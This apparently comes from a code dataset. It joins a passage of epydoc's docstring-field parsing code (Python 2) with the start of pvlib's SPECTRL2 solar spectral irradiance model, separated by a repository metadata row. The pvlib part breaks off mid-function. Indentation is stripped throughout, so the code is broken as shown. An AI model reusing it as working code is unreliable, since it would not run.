if var_name_re.match(m.canonical_name[-1])])
if removed:
# Remove the indicated submodules from this module.
api_doc.submodules = [m for m in api_doc.submodules
if m not in removed]
# Remove all ancestors of the indicated submodules
# from the docindex root. E.g., if module x
# declares y to be undocumented, then x.y.z should
# also be undocumented.
for elt in docindex.root[:]:
for m in removed:
if m.canonical_name.dominates(elt.canonical_name):
docindex.root.remove(elt)
def process_group_field(api_doc, docindex, tag, arg, descr):
"""Define a group named C{arg} containing the variables whose
names are listed in C{descr}."""
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=True)
api_doc.group_specs.append( (arg, _descr_to_identifiers(descr)) )
# [xx] should this also set sort order?
def process_deffield_field(api_doc, docindex, tag, arg, descr):
"""Define a new custom field."""
_check(api_doc, tag, arg, expect_arg=True)
if api_doc.extra_docstring_fields is UNKNOWN:
api_doc.extra_docstring_fields = []
try:
docstring_field = _descr_to_docstring_field(arg, descr)
docstring_field.varnames.append("__%s__" % arg)
api_doc.extra_docstring_fields.append(docstring_field)
except ValueError, e:
raise ValueError('Bad %s: %s' % (tag, e))
def process_raise_field(api_doc, docindex, tag, arg, descr):
"""Record the fact that C{api_doc} can raise the exception named
C{tag} in C{api_doc.exception_descrs}."""
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg='single')
try: name = DottedName(arg, strict=True)
except DottedName.InvalidDottedName: name = arg
api_doc.exception_descrs.append( (name, descr) )
def process_sort_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=False)
api_doc.sort_spec = _descr_to_identifiers(descr) + api_doc.sort_spec
# [xx] should I notice when they give a type for an unknown var?
def process_type_field(api_doc, docindex, tag, arg, descr):
# In namespace, "@type var: ..." describes the type of a var.
if isinstance(api_doc, NamespaceDoc):
_check(api_doc, tag, arg, expect_arg='single')
set_var_type(api_doc, arg, descr)
# For variables & properties, "@type: ..." describes the variable.
elif isinstance(api_doc, (VariableDoc, PropertyDoc)):
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.type_descr is not None:
raise ValueError(REDEFINED % tag)
api_doc.type_descr = descr
# For routines, "@type param: ..." describes a parameter.
elif isinstance(api_doc, RoutineDoc):
_check(api_doc, tag, arg, expect_arg='single')
if arg in api_doc.arg_types:
raise ValueError(REDEFINED % ('type for '+arg))
api_doc.arg_types[arg] = descr
else:
raise ValueError(BAD_CONTEXT % tag)
def process_var_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=ModuleDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
def process_cvar_field(api_doc, docindex, tag, arg, descr):
# If @cvar is used *within* a variable, then use it as the
# variable's description, and treat the variable as a class var.
if (isinstance(api_doc, VariableDoc) and
isinstance(api_doc.container, ClassDoc)):
_check(api_doc, tag, arg, expect_arg=False)
api_doc.is_instvar = False
api_doc.descr = markup.ConcatenatedDocstring(api_doc.descr, descr)
api_doc.summary, api_doc.other_docs = descr.summary()
# Otherwise, @cvar should be used in a class.
else:
_check(api_doc, tag, arg, context=ClassDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
api_doc.variables[ident].is_instvar = False
def process_ivar_field(api_doc, docindex, tag, arg, descr):
# If @ivar is used *within* a variable, then use it as the
# variable's description, and treat the variable as an instvar.
if (isinstance(api_doc, VariableDoc) and
isinstance(api_doc.container, ClassDoc)):
_check(api_doc, tag, arg, expect_arg=False)
# require that there be no other descr?
api_doc.is_instvar = True
api_doc.descr = markup.ConcatenatedDocstring(api_doc.descr, descr)
api_doc.summary, api_doc.other_docs = descr.summary()
# Otherwise, @ivar should be used in a class.
else:
_check(api_doc, tag, arg, context=ClassDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
api_doc.variables[ident].is_instvar = True
# [xx] '@return: foo' used to get used as a descr if no other
# descr was present. is that still true?
def process_return_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=False)
if api_doc.return_descr is not None:
raise ValueError(REDEFINED % 'return value description')
api_doc.return_descr = descr
def process_rtype_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg,
context=(RoutineDoc, PropertyDoc), expect_arg=False)
if isinstance(api_doc, RoutineDoc):
if api_doc.return_type is not None:
raise ValueError(REDEFINED % 'return value type')
api_doc.return_type = descr
elif isinstance(api_doc, PropertyDoc):
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.type_descr is not None:
raise ValueError(REDEFINED % tag)
api_doc.type_descr = descr
def process_arg_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=True)
idents = re.split('[:;, ] *', arg)
api_doc.arg_descrs.append( (idents, descr) )
# Check to make sure that the documented parameter(s) are
# actually part of the function signature.
all_args = api_doc.all_args()
if all_args not in (['...'], UNKNOWN):
bad_params = ['"%s"' % i for i in idents if i not in all_args]
if bad_params:
raise ValueError(BAD_PARAM % (tag, ', '.join(bad_params)))
def process_kwarg_field(api_doc, docindex, tag, arg, descr):
# [xx] these should -not- be checked if they exist..
# and listed separately or not??
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=True)
idents = re.split('[:;, ] *', arg)
api_doc.arg_descrs.append( (idents, descr) )
register_field_handler(process_group_field, 'group')
register_field_handler(process_deffield_field, 'deffield', 'newfield')
register_field_handler(process_sort_field, 'sort')
register_field_handler(process_summary_field, 'summary')
register_field_handler(process_undocumented_field, 'undocumented')
register_field_handler(process_include_field, 'include')
register_field_handler(process_var_field, 'var', 'variable')
register_field_handler(process_type_field, 'type')
register_field_handler(process_cvar_field, 'cvar', 'cvariable')
register_field_handler(process_ivar_field, 'ivar', 'ivariable')
register_field_handler(process_return_field, 'return', 'returns')
register_field_handler(process_rtype_field, 'rtype', 'returntype')
register_field_handler(process_arg_field, 'arg', 'argument',
'parameter', 'param')
register_field_handler(process_kwarg_field, 'kwarg', 'keyword', 'kwparam')
register_field_handler(process_raise_field, 'raise', 'raises',
'except', 'exception')
# Tags related to function parameters
PARAMETER_TAGS = ('arg', 'argument', 'parameter', 'param',
'kwarg', 'keyword', 'kwparam')
# Tags related to variables in a class
VARIABLE_TAGS = ('cvar', 'cvariable', 'ivar', 'ivariable')
# Tags related to exceptions
EXCEPTION_TAGS = ('raise', 'raises', 'except', 'exception')
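# Illustrative (hypothetical) docstring showing how several of these tags are
# typically combined in a single routine docstring:
#
#     def read_config(path):
#         """Load a configuration file.
#
#         @param path: Location of the file to read.
#         @type path: C{str}
#         @return: The parsed configuration.
#         @rtype: C{dict}
#         @raise IOError: If the file cannot be opened.
#         """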
######################################################################
#{ Helper Functions
######################################################################
def check_type_fields(api_doc, field_warnings):
"""Check to make sure that all type fields correspond to some
documented parameter; if not, append a warning to field_warnings."""
if isinstance(api_doc, RoutineDoc):
for arg in api_doc.arg_types:
if arg not in api_doc.all_args():
for args, descr in api_doc.arg_descrs:
if arg in args:
break
else:
field_warnings.append(BAD_PARAM % ('type', '"%s"' % arg))
def set_var_descr(api_doc, ident, descr):
if ident not in api_doc.variables:
api_doc.variables[ident] = VariableDoc(
container=api_doc, name=ident,
canonical_name=api_doc.canonical_name+ident)
var_doc = api_doc.variables[ident]
if var_doc.descr not in (None, UNKNOWN):
raise ValueError(REDEFINED % ('description for '+ident))
var_doc.descr = descr
if var_doc.summary in (None, UNKNOWN):
var_doc.summary, var_doc.other_docs = var_doc.descr.summary()
def set_var_type(api_doc, ident, descr):
if ident not in api_doc.variables:
api_doc.variables[ident] = VariableDoc(
container=api_doc, name=ident,
canonical_name=api_doc.canonical_name+ident)
var_doc = api_doc.variables[ident]
if var_doc.type_descr not in (None, UNKNOWN):
raise ValueError(REDEFINED % ('type for '+ident))
var_doc.type_descr = descr
def _check(api_doc, tag, arg, context=None, expect_arg=None):
if context is not None:
if not isinstance(api_doc, context):
raise ValueError(BAD_CONTEXT % tag)
if expect_arg is not None:
if expect_arg == True:
if arg is None:
raise ValueError(EXPECTED_ARG % tag)
elif expect_arg == False:
if arg is not None:
raise ValueError(UNEXPECTED_ARG % tag)
elif expect_arg == 'single':
if (arg is None or ' ' in arg):
raise ValueError(EXPECTED_SINGLE_ARG % tag)
else:
assert 0, 'bad value for expect_arg'
def get_docformat(api_doc, docindex):
"""
Return the name of the markup language that should be used to
parse the API documentation for the given object.
"""
# Find the module that defines api_doc.
module = api_doc.defining_module
# Look up its docformat.
if module is not UNKNOWN and module.docformat not in (None, UNKNOWN):
docformat = module.docformat
else:
docformat = DEFAULT_DOCFORMAT
# Convert to lower case & strip region codes.
try: return docformat.lower().split()[0]
except: return DEFAULT_DOCFORMAT
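# For example (hypothetical value): a docformat string of "Epytext en" is
# normalized to "epytext"; anything unparseable falls back to DEFAULT_DOCFORMAT.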
def unindent_docstring(docstring):
# [xx] copied from inspect.getdoc(); we can't use inspect.getdoc()
# itself, since it expects an object, not a string.
if not docstring: return ''
lines = docstring.expandtabs().split('\n')
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxint
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxint:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing (but not leading!) blank lines.
while lines and not lines[-1]:
lines.pop()
#while lines and not lines[0]:
# lines.pop(0)
return '\n'.join(lines)
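# Illustrative behaviour (hypothetical input), mirroring inspect.getdoc():
#     >>> unindent_docstring("Summary line.\n    Indented detail.\n\n")
#     'Summary line.\nIndented detail.'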
_IDENTIFIER_LIST_REGEXP = re.compile(r'^[\w.\*]+([\s,:;]\s*[\w.\*]+)*$')
def _descr_to_identifiers(descr):
"""
Given a C{ParsedDocstring} that contains a list of identifiers,
return a list of those identifiers. This is used by fields such
as C{@group} and C{@sort}, which expect lists of identifiers as
their values. To extract the identifiers, the docstring is first
converted to plaintext, and then split. The plaintext content of
    the docstring must be a list of identifiers, separated by
spaces, commas, colons, or semicolons.
@rtype: C{list} of C{string}
@return: A list of the identifier names contained in C{descr}.
@type descr: L{markup.ParsedDocstring}
@param descr: A C{ParsedDocstring} containing a list of
identifiers.
@raise ValueError: If C{descr} does not contain a valid list of
identifiers.
"""
idents = descr.to_plaintext(None).strip()
idents = re.sub(r'\s+', ' ', idents)
if not _IDENTIFIER_LIST_REGEXP.match(idents):
raise ValueError, 'Bad Identifier list: %r' % idents
rval = re.split('[:;, ] *', idents)
return rval
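# For illustration (hypothetical field value): once converted to plaintext, a
# field body such as "foo, bar; baz.qux" yields ['foo', 'bar', 'baz.qux'].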
def _descr_to_docstring_field(arg, descr):
tags = [s.lower() for s in re.split('[:;, ] *', arg)]
descr = descr.to_plaintext(None).strip()
args = re.split('[:;,] *', descr)
if len(args) == 0 or len(args) > 3:
raise ValueError, 'Wrong number of arguments'
singular = args[0]
if len(args) >= 2: plural = args[1]
else: plural = None
short = 0
if len(args) >= 3:
if args[2] == 'short': short = 1
else: raise ValueError('Bad arg 2 (expected "short")')
return DocstringField(tags, singular, plural, short)
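# Illustrative example (hypothetical): the docstring field
#     @newfield example: Example, Examples
# produces DocstringField(['example'], 'Example', 'Examples', 0), and the
# caller (process_deffield_field) additionally registers '__example__'.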
######################################################################
#{ Function Signature Extraction
######################################################################
# [XX] todo: add optional type modifiers?
_SIGNATURE_RE = re.compile(
# Class name (for builtin methods)
r'^\s*((?P<self>\w+)\.)?' +
# The function name (must match exactly) [XX] not anymore!
r'(?P<func>\w+)' +
# The parameters
r'\((?P<params>(\s*\[?\s*\*{0,2}[\w\-\.]+(\s*=.+?)?'+
r'(\s*\[?\s*,\s*\]?\s*\*{0,2}[\w\-\.]+(\s*=.+?)?)*\]*)?)\s*\)' +
# The return value (optional)
r'(\s*(->)\s*(?P<return>\S.*?))?'+
# The end marker
r'\s*(\n|\s+(--|<=+>)\s+|$|\.\s+|\.\n)')
"""A regular expression that is used to extract signatures from
docstrings."""
def parse_function_signature(func_doc, doc_source, docformat, parse_errors):
"""
Construct the signature for a builtin function or method from
its docstring. If the docstring uses the standard convention
of including a signature in the first line of the docstring
(and formats that signature according to standard
conventions), then it will be used to extract a signature.
Otherwise, the signature will be set to a single varargs
variable named C{"..."}.
@param func_doc: The target object where to store parsed signature. Also
container of the docstring to parse if doc_source is C{None}
@type func_doc: L{RoutineDoc}
@param doc_source: Contains the docstring to parse. If C{None}, parse
L{func_doc} docstring instead
@type doc_source: L{APIDoc}
@rtype: C{None}
"""
if doc_source is None:
doc_source = func_doc
# If there's no docstring, then don't do anything.
if not doc_source.docstring: return False
m = _SIGNATURE_RE.match(doc_source.docstring)
if m is None: return False
# Do I want to be this strict?
# Notice that __init__ must match the class name instead, if the signature
# comes from the class docstring
# if not (m.group('func') == func_doc.canonical_name[-1] or
# '_'+m.group('func') == func_doc.canonical_name[-1]):
# log.warning("Not extracting function signature from %s's "
# "docstring, since the name doesn't match." %
# func_doc.canonical_name)
# return False
params = m.group('params')
rtype = m.group('return')
selfparam = m.group('self')
# Extract the parameters from the signature.
func_doc.posargs = []
func_doc.vararg = None
func_doc.kwarg = None
if func_doc.posarg_defaults is UNKNOWN:
func_doc.posarg_defaults = []
if params:
# Figure out which parameters are optional.
while '[' in params or ']' in params:
m2 = re.match(r'(.*)\[([^\[\]]+)\](.*)', params)
if not m2: return False
(start, mid, end) = m2.groups()
mid = re.sub(r'((,|^)\s*[\w\-\.]+)', r'\1=...', mid)
params = start+mid+end
params = re.sub(r'=...=' , r'=', params)
for name in params.split(','):
if '=' in name:
(name, default_repr) = name.split('=',1)
default = GenericValueDoc(parse_repr=default_repr)
else:
default = None
name = name.strip()
if name == '...':
func_doc.vararg = '...'
elif name.startswith('**'):
func_doc.kwarg = name[2:]
elif name.startswith('*'):
func_doc.vararg = name[1:]
else:
func_doc.posargs.append(name)
if len(func_doc.posarg_defaults) < len(func_doc.posargs):
func_doc.posarg_defaults.append(default)
elif default is not None:
argnum = len(func_doc.posargs)-1
func_doc.posarg_defaults[argnum] = default
# Extract the return type/value from the signature
if rtype:
func_doc.return_type = markup.parse(rtype, docformat, parse_errors,
inline=True)
# Add the self parameter, if it was specified.
if selfparam:
func_doc.posargs.insert(0, selfparam)
func_doc.posarg_defaults.insert(0, None)
# Remove the signature from the docstring.
doc_source.docstring = doc_source.docstring[m.end():]
# We found a signature.
return True
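# Illustrative behaviour (hypothetical docstring): for a RoutineDoc whose
# docstring begins "split(sep=None, maxsplit=-1) -> list of strings\n...",
# this sets posargs=['sep', 'maxsplit'], fills posarg_defaults from the
# parsed default reprs, parses "list of strings" as the return type, and
# strips the signature line from the docstring.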
| apache-2.0 |
cwhanse/pvlib-python | pvlib/spectrum/spectrl2.py | 3 | 18269 | r"""
The ``spectrl2`` module implements the Bird Simple Spectral Model.
"""
import pvlib
from pvlib.tools import cosd
import numpy as np
import pandas as pd
# SPECTRL2 extraterrestrial spectrum and atmospheric absorption coefficients
_SPECTRL2_COEFFS = np.zeros(122, dtype=np.dtype([
('wavelength', 'float64'),
('spectral_irradiance_et', 'float64'),
('water_vapor_absorption', 'float64'),
('ozone_absorption', 'float64'),
('mixed_absorption', 'float64'),
]))
_SPECTRL2_COEFFS['wavelength'] = [ # nm
300.0, 305.0, 310.0, 315.0, 320.0, 325.0, 330.0, 335.0, 340.0, 345.0,
350.0, 360.0, 370.0, 380.0, 390.0, 400.0, 410.0, 420.0, 430.0, 440.0,
450.0, 460.0, 470.0, 480.0, 490.0, 500.0, 510.0, 520.0, 530.0, 540.0,
550.0, 570.0, 593.0, 610.0, 630.0, 656.0, 667.6, 690.0, 710.0, 718.0,
724.4, 740.0, 752.5, 757.5, 762.5, 767.5, 780.0, 800.0, 816.0, 823.7,
831.5, 840.0, 860.0, 880.0, 905.0, 915.0, 925.0, 930.0, 937.0, 948.0,
965.0, 980.0, 993.5, 1040.0, 1070.0, 1100.0, 1120.0, 1130.0, 1145.0,
1161.0, 1170.0, 1200.0, 1240.0, 1270.0, 1290.0, 1320.0, 1350.0, 1395.0,
1442.5, 1462.5, 1477.0, 1497.0, 1520.0, 1539.0, 1558.0, 1578.0, 1592.0,
1610.0, 1630.0, 1646.0, 1678.0, 1740.0, 1800.0, 1860.0, 1920.0, 1960.0,
1985.0, 2005.0, 2035.0, 2065.0, 2100.0, 2148.0, 2198.0, 2270.0, 2360.0,
2450.0, 2500.0, 2600.0, 2700.0, 2800.0, 2900.0, 3000.0, 3100.0, 3200.0,
3300.0, 3400.0, 3500.0, 3600.0, 3700.0, 3800.0, 3900.0, 4000.0
]
_SPECTRL2_COEFFS['spectral_irradiance_et'] = [ # W/m^2/nm
0.5359, 0.5583, 0.622, 0.6927, 0.7151, 0.8329, 0.9619, 0.9319, 0.9006,
0.9113, 0.9755, 0.9759, 1.1199, 1.1038, 1.0338, 1.4791, 1.7013, 1.7404,
1.5872, 1.837, 2.005, 2.043, 1.987, 2.027, 1.896, 1.909, 1.927, 1.831,
1.891, 1.898, 1.892, 1.84, 1.768, 1.728, 1.658, 1.524, 1.531, 1.42,
1.399, 1.374, 1.373, 1.298, 1.269, 1.245, 1.223, 1.205, 1.183, 1.148,
1.091, 1.062, 1.038, 1.022, 0.9987, 0.9472, 0.8932, 0.8682, 0.8297,
0.8303, 0.814, 0.7869, 0.7683, 0.767, 0.7576, 0.6881, 0.6407, 0.6062,
0.5859, 0.5702, 0.5641, 0.5442, 0.5334, 0.5016, 0.4775, 0.4427, 0.44,
0.4168, 0.3914, 0.3589, 0.3275, 0.3175, 0.3073, 0.3004, 0.2928, 0.2755,
0.2721, 0.2593, 0.2469, 0.244, 0.2435, 0.2348, 0.2205, 0.1908, 0.1711,
0.1445, 0.1357, 0.123, 0.1238, 0.113, 0.1085, 0.0975, 0.0924, 0.0824,
0.0746, 0.0683, 0.0638, 0.0495, 0.0485, 0.0386, 0.0366, 0.032, 0.0281,
0.0248, 0.0221, 0.0196, 0.0175, 0.0157, 0.0141, 0.0127, 0.0115, 0.0104,
0.0095, 0.0086
]
_SPECTRL2_COEFFS['water_vapor_absorption'] = [
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.075, 0.0, 0.0, 0.0, 0.0, 0.016, 0.0125, 1.8, 2.5, 0.061,
0.0008, 0.0001, 1e-05, 1e-05, 0.0006, 0.036, 1.6, 2.5, 0.5, 0.155, 1e-05,
0.0026, 7.0, 5.0, 5.0, 27.0, 55.0, 45.0, 4.0, 1.48, 0.1, 1e-05, 0.001, 3.2,
115.0, 70.0, 75.0, 10.0, 5.0, 2.0, 0.002, 0.002, 0.1, 4.0, 200.0, 1000.0,
185.0, 80.0, 80.0, 12.0, 0.16, 0.002, 0.0005, 0.0001, 1e-05, 0.0001, 0.001,
0.01, 0.036, 1.1, 130.0, 1000.0, 500.0, 100.0, 4.0, 2.9, 1.0, 0.4, 0.22,
0.25, 0.33, 0.5, 4.0, 80.0, 310.0, 15000.0, 22000.0, 8000.0, 650.0, 240.0,
230.0, 100.0, 120.0, 19.5, 3.6, 3.1, 2.5, 1.4, 0.17, 0.0045
]
_SPECTRL2_COEFFS['ozone_absorption'] = [
10.0, 4.8, 2.7, 1.35, 0.8, 0.38, 0.16, 0.075, 0.04, 0.019, 0.007, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003, 0.006, 0.009, 0.014, 0.021, 0.03,
0.04, 0.048, 0.063, 0.075, 0.085, 0.12, 0.119, 0.12, 0.09, 0.065, 0.051,
0.028, 0.018, 0.015, 0.012, 0.01, 0.008, 0.007, 0.006, 0.005, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
]
_SPECTRL2_COEFFS['mixed_absorption'] = [
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.15, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0,
0.35, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05, 0.3,
0.02, 0.0002, 0.00011, 1e-05, 0.05, 0.011, 0.005, 0.0006, 0.0, 0.005, 0.13,
0.04, 0.06, 0.13, 0.001, 0.0014, 0.0001, 1e-05, 1e-05, 0.0001, 0.001, 4.3,
0.2, 21.0, 0.13, 1.0, 0.08, 0.001, 0.00038, 0.001, 0.0005, 0.00015,
0.00014, 0.00066, 100.0, 150.0, 0.13, 0.0095, 0.001, 0.8, 1.9, 1.3, 0.075,
0.01, 0.00195, 0.004, 0.29, 0.025
]
def _spectrl2_transmittances(apparent_zenith, relative_airmass,
surface_pressure, precipitable_water, ozone,
optical_thickness, scattering_albedo, dayofyear):
"""
Calculate transmittance factors from Section 2 of Bird and Riordan 1984.
Parameters
----------
apparent_zenith, relative_airmass, surface_pressure, precipitable_water,
ozone, dayofyear: float or 1d np.array
One value per timestamp
optical_thickness, scattering_albedo: np.ndarray
Array with shape (122, N) where N is either 1 or len(apparent_zenith)
Returns
-------
earth_sun_distance_correction: float or 1d np.array
Same shape/type as apparent_zenith
rayleigh_transmittance, aerosol_transmittance, vapor_transmittance,
ozone_transmittance, mixed_transmittance, aerosol_scattering,
aerosol_absorption: np.ndarray
Array with shape (122, N) where N is len(apparent_zenith)
"""
# add a dimension so that each ndarray is 2d with shape (122, 1)
wavelength = _SPECTRL2_COEFFS['wavelength'][:, np.newaxis]
vapor_coeff = _SPECTRL2_COEFFS['water_vapor_absorption'][:, np.newaxis]
ozone_coeff = _SPECTRL2_COEFFS['ozone_absorption'][:, np.newaxis]
mixed_coeff = _SPECTRL2_COEFFS['mixed_absorption'][:, np.newaxis]
# ET spectral irradiance correction for earth-sun distance seasonality.
# Note that we only want the distance correction coefficient, so set
# solar_constant=1:
earth_sun_distance_correction = \
pvlib.irradiance.get_extra_radiation(dayofyear, method='spencer',
solar_constant=1) # Eq 2-2, 2-3
# Rayleigh scattering
    # note: 101300 is used for consistency with reference; can't use
# atmosphere.get_absolute_airmass because it uses 101325
airmass = relative_airmass * surface_pressure / 101300
wavelength_um = wavelength / 1000
rayleigh_transmittance = np.exp(
# Note: the report uses 1.335 but spectrl2_2.c uses 1.3366
# -airmass / (wavelength_um**4 * (115.6406 - 1.335 / wavelength_um**2))
-airmass / (wavelength_um**4 * (115.6406 - 1.3366 / wavelength_um**2))
) # Eq 2-4
# Aerosol scattering and absorption, Eq 2-6
aerosol_transmittance = np.exp(-optical_thickness * relative_airmass)
# Water vapor absorption, Eq 2-8
aWM = vapor_coeff * precipitable_water * relative_airmass
vapor_transmittance = np.exp(-0.2385 * aWM / (1 + 20.07 * aWM)**0.45)
# Ozone absorption
ozone_max_height = 22
h0_norm = ozone_max_height / 6370
ozone_mass_numerator = (1 + h0_norm)
ozone_mass_denominator = np.sqrt(cosd(apparent_zenith)**2 + 2 * h0_norm)
ozone_mass = ozone_mass_numerator / ozone_mass_denominator # Eq 2-10
ozone_transmittance = np.exp(-ozone_coeff * ozone * ozone_mass) # Eq 2-9
# Mixed gas absorption, Eq 2-11
aM = mixed_coeff * airmass
# Note: the report uses 118.93, but spectrl2_2.c uses 118.3
# mixed_transmittance = np.exp(-1.41 * aM / (1 + 118.93 * aM)**0.45)
mixed_transmittance = np.exp(-1.41 * aM / (1 + 118.3 * aM)**0.45)
# split out aerosol components for diffuse irradiance calcs
aerosol_scattering = np.exp(
-scattering_albedo * optical_thickness * relative_airmass
) # Eq 3-9
aerosol_absorption = np.exp(
-(1 - scattering_albedo) * optical_thickness * relative_airmass
) # Eq 3-10
return (
earth_sun_distance_correction,
rayleigh_transmittance,
aerosol_transmittance,
vapor_transmittance,
ozone_transmittance,
mixed_transmittance,
aerosol_scattering,
aerosol_absorption,
)
def spectrl2(apparent_zenith, aoi, surface_tilt, ground_albedo,
surface_pressure, relative_airmass, precipitable_water, ozone,
aerosol_turbidity_500nm, dayofyear=None,
scattering_albedo_400nm=0.945, alpha=1.14,
wavelength_variation_factor=0.095, aerosol_asymmetry_factor=0.65):
"""
Estimate spectral irradiance using the Bird Simple Spectral Model
(SPECTRL2).
The Bird Simple Spectral Model [1]_ produces terrestrial spectra between
300 and 4000 nm with a resolution of approximately 10 nm. Direct and
diffuse spectral irradiance are modeled for horizontal and tilted surfaces
under cloudless skies. SPECTRL2 models radiative transmission, absorption,
and scattering due to atmospheric aerosol, water vapor, and ozone content.
Parameters
----------
apparent_zenith : numeric
Solar zenith angle [degrees]
aoi : numeric
Angle of incidence of the solar vector on the panel [degrees]
surface_tilt : numeric
Panel tilt from horizontal [degrees]
ground_albedo : numeric
Albedo [0-1] of the ground surface. Can be provided as a scalar value
if albedo is not spectrally-dependent, or as a 122xN matrix where
the first dimension spans the wavelength range and the second spans
the number of simulations. [unitless]
surface_pressure : numeric
Surface pressure [Pa]
relative_airmass : numeric
Relative airmass. The airmass model used in [1]_ is the `'kasten1966'`
model, while a later implementation by NREL uses the
`'kastenyoung1989'` model. [unitless]
precipitable_water : numeric
Atmospheric water vapor content [cm]
ozone : numeric
Atmospheric ozone content [atm-cm]
aerosol_turbidity_500nm : numeric
Aerosol turbidity at 500 nm [unitless]
dayofyear : numeric, optional
The day of year [1-365]. Must be provided if ``apparent_zenith`` is
not a pandas Series.
scattering_albedo_400nm : numeric, default 0.945
Aerosol single scattering albedo at 400nm. The default value of 0.945
is suggested in [1]_ for a rural aerosol model. [unitless]
alpha : numeric, default 1.14
Angstrom turbidity exponent. The default value of 1.14 is suggested
in [1]_ for a rural aerosol model. [unitless]
wavelength_variation_factor : numeric, default 0.095
Wavelength variation factor [unitless]
aerosol_asymmetry_factor : numeric, default 0.65
Aerosol asymmetry factor (mean cosine of scattering angle) [unitless]
Returns
-------
spectra : dict
A dict of arrays. With the exception of `wavelength`, which has length
122, each array has shape (122, N) where N is the length of the
input ``apparent_zenith``. All values are spectral irradiance
with units W/m^2/nm except for `wavelength`, which is in nanometers.
* wavelength
* dni_extra
* dhi
* dni
* poa_sky_diffuse
* poa_ground_diffuse
* poa_direct
* poa_global
Notes
-----
NREL's C implementation ``spectrl2_2.c`` [2]_ of the model differs in
several ways from the original report [1]_. The report itself also has
a few differences between the in-text equations and the code appendix.
The list of known differences is shown below. Note that this
implementation follows ``spectrl2_2.c``.
=================== ========== ========== ===============
Equation Report Appendix spectrl2_2.c
=================== ========== ========== ===============
2-4 1.335 1.335 1.3366
2-11 118.93 118.93 118.3
3-8 To' Tu' Tu'
3-5, 3-6, 3-7, 3-1 double Cs single Cs single Cs
2-5 kasten1966 kasten1966 kastenyoung1989
=================== ========== ========== ===============
References
----------
.. [1] Bird, R, and Riordan, C., 1984, "Simple solar spectral model for
direct and diffuse irradiance on horizontal and tilted planes at the
earth's surface for cloudless atmospheres", NREL Technical Report
TR-215-2436 doi:10.2172/5986936.
.. [2] Bird Simple Spectral Model: spectrl2_2.c.
https://www.nrel.gov/grid/solar-resource/spectral.html
"""
# values need to be np arrays for broadcasting, so unwrap Series if needed:
is_pandas = isinstance(apparent_zenith, pd.Series)
if is_pandas:
original_index = apparent_zenith.index
(apparent_zenith, aoi, surface_tilt, ground_albedo, surface_pressure,
relative_airmass, precipitable_water, ozone, aerosol_turbidity_500nm,
scattering_albedo_400nm, alpha, wavelength_variation_factor,
aerosol_asymmetry_factor) = \
tuple(map(np.asanyarray, [
apparent_zenith, aoi, surface_tilt, ground_albedo,
surface_pressure, relative_airmass, precipitable_water, ozone,
aerosol_turbidity_500nm, scattering_albedo_400nm, alpha,
wavelength_variation_factor, aerosol_asymmetry_factor]))
dayofyear = original_index.dayofyear.values
if not is_pandas and dayofyear is None:
raise ValueError('dayofyear must be specified if not using pandas '
'Series inputs')
# add a dimension so that each ndarray is 2d with shape (122, 1)
wavelength = _SPECTRL2_COEFFS['wavelength'][:, np.newaxis]
spectrum_et = _SPECTRL2_COEFFS['spectral_irradiance_et'][:, np.newaxis]
optical_thickness = \
pvlib.atmosphere.angstrom_aod_at_lambda(aod0=aerosol_turbidity_500nm,
lambda0=500, alpha=alpha,
lambda1=wavelength) # Eq 2-7
# Eq 3-16
scattering_albedo = scattering_albedo_400nm * \
np.exp(-wavelength_variation_factor * np.log(wavelength / 400)**2)
spectrl2 = _spectrl2_transmittances(apparent_zenith, relative_airmass,
surface_pressure, precipitable_water,
ozone, optical_thickness,
scattering_albedo, dayofyear)
